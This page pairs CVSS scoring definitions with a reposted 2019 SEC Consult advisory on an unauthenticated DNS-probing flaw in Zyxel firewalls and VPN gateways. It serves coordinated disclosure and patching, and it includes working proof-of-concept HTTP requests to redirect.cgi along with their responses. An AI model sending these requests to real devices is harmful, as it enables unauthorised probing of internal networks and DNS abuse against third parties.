The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
High
AC
The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Zyxel USG/UAG/ATP/VPN/NXC External DNS Requests
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 >
=======================================================================
title: External DNS Requests
product: Zyxel USG/UAG/ATP/VPN/NXC series
vulnerable version: see "Vulnerable / tested version"
fixed version: see "Solution"
CVE number: -
impact: medium
homepage: https://www.zyxel.com
found: 2019-06-19
by: Thomas Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.
We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource we are Zyxel, Your Networking Ally."
Source: https://www.zyxel.com/about_zyxel/company_overview.shtml
Business recommendation:
------------------------
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.
Vulnerability overview/description:
-----------------------------------
1) Information Disclosure via Unauthenticated External DNS Requests
A DNS request can be made by an unauthenticated attacker to either spam a DNS
service of a third party with requests that have a spoofed origin or probe
whether domain names are present on the internal network behind the firewall.
Proof of concept:
-----------------
1) Information Disclosure via Unauthenticated External DNS Requests
By sending the following POST request an attacker can probe for the domain
"subdomain.domain.com":
-------------------------------------------------------------------------------
POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
arip=subdomain.domain.com
-------------------------------------------------------------------------------
The following GET request can be used for the same purpose:
-------------------------------------------------------------------------------
GET /redirect.cgi?arip=subdomain.domain.com&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
-------------------------------------------------------------------------------
If the domain can be resolved, the response contains the resolved IP address
within the cookie value:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2019 08:14:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Set-Cookie: arip=<IP-of-subdomain.domain.com>; path=/
Set-Cookie: zy_pc_browser=1; path=/
Connection: close
Content-Type: text/html
Content-Length: 9099
[...]
-------------------------------------------------------------------------------
If the domain cannot be resolved, a redirection will be returned:
-------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Mon, 24 Jun 2019 08:11:57 GMT
Location: ext-js/app/view/login/useraware.html
Content-Length: 220
Connection: close
Content-Type: text/html; charset=iso-8859-1
[...]
-------------------------------------------------------------------------------
Vulnerable / tested versions:
-----------------------------
The following versions have been tested, other versions might be affected as
well:
Zyxel USG110 ZLD 4.33
Zyxel USG210 ZLD 4.33
Zyxel USG310 ZLD 4.33
Zyxel USG1100 ZLD 4.33
Zyxel USG1900 ZLD 4.33
Zyxel USG2200-VPN ZLD 4.33
Zyxel UAG2100 ZLD 4.18
Zyxel UAG4100 ZLD 4.18
The vendor provided the following list of affected devices:
Zyxel ATP200 ZLD4.33 patch 1 and earlier
Zyxel ATP500 ZLD4.33 patch 1 and earlier
Zyxel ATP800 ZLD4.33 patch 1 and earlier
Zyxel UAG2100 4.18 patch 1 and earlier
Zyxel UAG4100 4.18 patch 1 and earlier
Zyxel VPN50 SD-OS 10.02 and earlier
Zyxel VPN100 SD-OS 10.02 and earlier
Zyxel VPN300 SD-OS 10.02 and earlier
Zyxel USG20-VPN ZLD4.33 and earlier
Zyxel USG20W-VPN ZLD4.33 and earlier
Zyxel USG40 ZLD4.33 and earlier
Zyxel USG40W ZLD4.33 and earlier
Zyxel USG60 ZLD4.33 and earlier
Zyxel USG60W ZLD4.33 and earlier
Zyxel USG110 ZLD4.33 and earlier
Zyxel USG210 ZLD4.33 and earlier
Zyxel USG310 ZLD4.33 and earlier
Zyxel USG1100 ZLD4.33 and earlier
Zyxel USG1900 ZLD4.33 and earlier
Zyxel USG2200 ZLD4.33 and earlier
Zyxel NXC2500 5.40 and earlier
Zyxel NXC5500 5.40 and earlier
-------------------------------------------------------------------------------
Vendor contact timeline:
------------------------
2019-06-26: Contacting vendor through [email protected].
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor
confirmed receipt.
2019-07-03: Asked for an update; Vendor told that they just finished their
investigation.
2019-07-09: Vendor provided a full list of devices that are prone to this
vulnerability.
2019-07-23: Asked for a timeline; Vendor asked to shift the release of the
advisory to 2019-08-29 in order to provide fixes; Shifted advisory
release to this date.
2019-08-26: Asked for a status update; Vendor told that fixes are ready to be
published at 2019-08-29.
2019-08-29: Coordinated advisory release.
Solution:
---------
Install the newest firmware for your device from the vendor's website
to fix this issue:
https://www.zyxel.com/support/download_landing.shtml
Additionally, the vendor provides the following security notice:
https://www.zyxel.com/support/web-CGI-vulnerability-of-gateways-and-access-point-controllers.shtml
Workaround:
-----------
Restrict network access to the web interface.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T.Weber / @2019
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum